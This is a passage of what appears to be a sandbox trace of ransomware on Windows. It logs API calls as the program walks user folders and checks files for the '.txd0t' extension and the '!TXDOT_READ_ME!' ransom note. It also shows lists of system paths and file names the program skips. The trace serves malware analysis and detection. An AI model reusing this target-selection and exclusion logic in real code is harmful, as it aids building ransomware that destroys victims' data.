[0090.236] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.236] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="C:\\Program Files") returned 0x0 [0090.236] GetProcessHeap () returned 0xe30000 [0090.236] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4f8) returned 0xecc4e0 [0090.236] StrCpyNW (in: psz1=0xecc4e0, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", cchMax=1144 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1" [0090.236] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", psz2="\\*", cchMax=1144 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\*") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\*" [0090.237] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\*", lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdece000, ftCreationTime.dwHighDateTime=0x1d5ee36, ftLastAccessTime.dwLowDateTime=0x5255457f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5255457f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x770ea4, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2470 [0090.237] StrCmpW (psz1=".", psz2=".") returned 0 [0090.237] FindNextFileW (in: hFindFile=0xec2470, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdece000, ftCreationTime.dwHighDateTime=0x1d5ee36, ftLastAccessTime.dwLowDateTime=0x5255457f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5255457f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x770ea4, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.237] StrCmpW (psz1="..", psz2=".") returned 1 [0090.237] StrCmpW (psz1="..", psz2="..") returned 0 [0090.237] FindNextFileW (in: hFindFile=0xec2470, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x524613ac, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x524613ac, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52500e1d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x770ea4, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0090.237] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0090.237] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0090.237] StrCpyNW (in: psz1=0xecc4e0, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", cchMax=1144 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1" [0090.237] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", psz2="\\", cchMax=1144 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\" [0090.237] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1144 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\!TXDOT_READ_ME!.txt" [0090.237] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0090.237] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0090.237] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0090.237] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0090.237] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0090.237] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0090.237] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0090.237] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0090.237] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0090.237] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0090.237] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0090.237] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0090.237] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0090.237] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0090.237] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0090.237] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0090.237] FindNextFileW (in: hFindFile=0xec2470, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9405f720, ftCreationTime.dwHighDateTime=0x1d5ed16, ftLastAccessTime.dwLowDateTime=0xa95acb70, ftLastAccessTime.dwHighDateTime=0x1d5e882, ftLastWriteTime.dwLowDateTime=0x5213e9a4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x13877, dwReserved0=0x770ea4, dwReserved1=0x0, cFileName="HN-OE9UFOJ0.mp3.txd0t", cAlternateFileName="HN-OE9~1.TXD")) returned 1 [0090.237] StrCmpW (psz1="HN-OE9UFOJ0.mp3.txd0t", psz2=".") returned 1 [0090.237] StrCmpW (psz1="HN-OE9UFOJ0.mp3.txd0t", psz2="..") returned 1 [0090.237] StrCpyNW (in: psz1=0xecc4e0, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", cchMax=1144 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1" [0090.238] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", psz2="\\", cchMax=1144 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\" [0090.238] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\", psz2="HN-OE9UFOJ0.mp3.txd0t", cchMax=1144 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\HN-OE9UFOJ0.mp3.txd0t") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\HN-OE9UFOJ0.mp3.txd0t" [0090.238] PathFindExtensionW (pszPath="HN-OE9UFOJ0.mp3.txd0t") returned=".txd0t" [0090.238] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.238] FindNextFileW (in: hFindFile=0xec2470, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8cbcf510, ftCreationTime.dwHighDateTime=0x1d5f03e, ftLastAccessTime.dwLowDateTime=0x25427f90, ftLastAccessTime.dwHighDateTime=0x1d5e8b4, ftLastWriteTime.dwLowDateTime=0x521649ca, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x6777, dwReserved0=0x770ea4, dwReserved1=0x0, cFileName="uUCd01DT4yfQz.wav.txd0t", cAlternateFileName="UUCD01~1.TXD")) returned 1 [0090.238] StrCmpW (psz1="uUCd01DT4yfQz.wav.txd0t", psz2=".") returned 1 [0090.238] StrCmpW (psz1="uUCd01DT4yfQz.wav.txd0t", psz2="..") returned 1 [0090.238] StrCpyNW (in: psz1=0xecc4e0, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", cchMax=1144 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1" [0090.238] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", psz2="\\", cchMax=1144 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\" [0090.238] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\", psz2="uUCd01DT4yfQz.wav.txd0t", cchMax=1144 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\uUCd01DT4yfQz.wav.txd0t") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\uUCd01DT4yfQz.wav.txd0t" [0090.238] PathFindExtensionW (pszPath="uUCd01DT4yfQz.wav.txd0t") returned=".txd0t" [0090.238] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.238] FindNextFileW (in: hFindFile=0xec2470, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8cbcf510, ftCreationTime.dwHighDateTime=0x1d5f03e, ftLastAccessTime.dwLowDateTime=0x25427f90, ftLastAccessTime.dwHighDateTime=0x1d5e8b4, ftLastWriteTime.dwLowDateTime=0x521649ca, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x6777, dwReserved0=0x770ea4, dwReserved1=0x0, cFileName="uUCd01DT4yfQz.wav.txd0t", cAlternateFileName="UUCD01~1.TXD")) returned 0 [0090.238] FindClose (in: hFindFile=0xec2470 | out: hFindFile=0xec2470) returned 1 [0090.238] GetProcessHeap () returned 0xe30000 [0090.238] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecc4e0 | out: hHeap=0xe30000) returned 1 [0090.238] FindNextFileW (in: hFindFile=0xec2070, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdece000, ftCreationTime.dwHighDateTime=0x1d5ee36, ftLastAccessTime.dwLowDateTime=0x5255457f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5255457f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="toS-EwE0vCCwoskwD1", cAlternateFileName="TOS-EW~1")) returned 0 [0090.238] FindClose (in: hFindFile=0xec2070 | out: hFindFile=0xec2070) returned 1 [0090.238] GetProcessHeap () returned 0xe30000 [0090.238] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecaff8 | out: hHeap=0xe30000) returned 1 [0090.238] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc7e8eb70, ftCreationTime.dwHighDateTime=0x1d5eef0, ftLastAccessTime.dwLowDateTime=0x524877ee, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x524877ee, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="z37nyAMgu2jp3cfWIU", cAlternateFileName="Z37NYA~1")) returned 0 [0090.238] FindClose (in: hFindFile=0xec23b0 | out: hFindFile=0xec23b0) returned 1 [0090.238] GetProcessHeap () returned 0xe30000 [0090.238] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec75a0 | out: hHeap=0xe30000) returned 1 [0090.238] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0090.238] StrCmpW (psz1="My Documents", psz2=".") returned 1 [0090.238] StrCmpW (psz1="My Documents", psz2="..") returned 1 [0090.238] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0090.238] StrCmpW (psz1="NetHood", psz2=".") returned 1 [0090.238] StrCmpW (psz1="NetHood", psz2="..") returned 1 [0090.239] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x6c4d382c, ftLastAccessTime.dwHighDateTime=0x1d5e877, ftLastWriteTime.dwLowDateTime=0x6c4d382c, ftLastWriteTime.dwHighDateTime=0x1d5e877, nFileSizeHigh=0x0, nFileSizeLow=0x300000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0090.239] StrCmpW (psz1="NTUSER.DAT", psz2=".") returned 1 [0090.239] StrCmpW (psz1="NTUSER.DAT", psz2="..") returned 1 [0090.239] StrCpyNW (in: psz1=0xec60f0, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0090.239] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0090.239] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="NTUSER.DAT", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\NTUSER.DAT") returned="C:\\Users\\FD1HVy\\NTUSER.DAT" [0090.239] PathFindExtensionW (pszPath="NTUSER.DAT") returned=".DAT" [0090.239] StrCmpW (psz1=".DAT", psz2=".txd0t") returned -1 [0090.239] StrCmpIW (psz1="NTUSER.DAT", psz2="bootsect.bak") returned 1 [0090.239] StrCmpIW (psz1="NTUSER.DAT", psz2="iconcache.db") returned 1 [0090.239] StrCmpIW (psz1="NTUSER.DAT", psz2="thumbs.db") returned -1 [0090.239] StrCmpIW (psz1="NTUSER.DAT", psz2=" ransomware ") returned 1 [0090.239] StrCmpIW (psz1="NTUSER.DAT", psz2=" ransom ") returned 1 [0090.239] StrCmpIW (psz1="NTUSER.DAT", psz2="debug.txt") returned 1 [0090.239] StrCmpIW (psz1="NTUSER.DAT", psz2="boot.ini") returned 1 [0090.239] StrCmpIW (psz1="NTUSER.DAT", psz2="desktop.ini") returned 1 [0090.239] StrCmpIW (psz1="NTUSER.DAT", psz2="autorun.inf") returned 1 [0090.239] StrCmpIW (psz1="NTUSER.DAT", psz2="ntuser.dat") returned 0 [0090.239] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x21204700, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x21204700, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x21204700, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0xa9000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0090.239] StrCmpW (psz1="ntuser.dat.LOG1", psz2=".") returned 1 [0090.239] StrCmpW (psz1="ntuser.dat.LOG1", psz2="..") returned 1 [0090.239] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x21204700, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x21204700, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x21204700, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0090.239] StrCmpW (psz1="ntuser.dat.LOG2", psz2=".") returned 1 [0090.239] StrCmpW (psz1="ntuser.dat.LOG2", psz2="..") returned 1 [0090.239] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x21204700, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x21204700, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x4edc6408, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0090.239] StrCmpW (psz1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", psz2=".") returned 1 [0090.239] StrCmpW (psz1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", psz2="..") returned 1 [0090.239] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2122a949, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x2122a949, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x4edc6408, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0090.239] StrCmpW (psz1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", psz2=".") returned 1 [0090.239] StrCmpW (psz1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", psz2="..") returned 1 [0090.239] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2122a949, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x2122a949, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x4edc6408, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0090.239] StrCmpW (psz1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", psz2=".") returned 1 [0090.239] StrCmpW (psz1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", psz2="..") returned 1 [0090.239] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xc1adea7d, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xc1adea7d, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xc1adea7d, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0090.240] StrCmpW (psz1="ntuser.ini", psz2=".") returned 1 [0090.240] StrCmpW (psz1="ntuser.ini", psz2="..") returned 1 [0090.240] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3f0f0bc5, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd4516574, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x94022772, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OneDrive", cAlternateFileName="")) returned 1 [0090.240] StrCmpW (psz1="OneDrive", psz2=".") returned 1 [0090.240] StrCmpW (psz1="OneDrive", psz2="..") returned 1 [0090.240] StrCpyNW (in: psz1=0xec60f0, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0090.240] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0090.240] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="OneDrive", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\OneDrive") returned="C:\\Users\\FD1HVy\\OneDrive" [0090.240] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="\\windows\\system32\\") returned 0x0 [0090.240] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.240] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="\\windows\\system\\") returned 0x0 [0090.240] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.240] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.240] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="\\appdata\\local\\") returned 0x0 [0090.240] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.240] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.240] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.240] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch=":\\boot\\") returned 0x0 [0090.240] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch=":\\perflogs\\") returned 0x0 [0090.240] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch=":\\programdata\\") returned 0x0 [0090.240] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch=":\\drivers\\") returned 0x0 [0090.240] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch=":\\wsus\\") returned 0x0 [0090.240] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.240] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.240] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="crypt_detect") returned 0x0 [0090.240] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="cryptolocker") returned 0x0 [0090.240] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="ransomware") returned 0x0 [0090.240] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="C:\\WINDOWS") returned 0x0 [0090.240] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="C:\\Program Files (x86)") returned 0x0 [0090.240] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="C:\\Program Files") returned 0x0 [0090.240] GetProcessHeap () returned 0xe30000 [0090.240] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b2) returned 0xedac48 [0090.240] StrCpyNW (in: psz1=0xedac48, psz2="C:\\Users\\FD1HVy\\OneDrive", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\OneDrive") returned="C:\\Users\\FD1HVy\\OneDrive" [0090.240] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\OneDrive", psz2="\\*", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\OneDrive\\*") returned="C:\\Users\\FD1HVy\\OneDrive\\*" [0090.241] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\OneDrive\\*", lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3f0f0bc5, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd4516574, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x94022772, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec20f0 [0090.241] StrCmpW (psz1=".", psz2=".") returned 0 [0090.241] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3f0f0bc5, ftCreationTime.dwHighDateTime=0x1d32715, 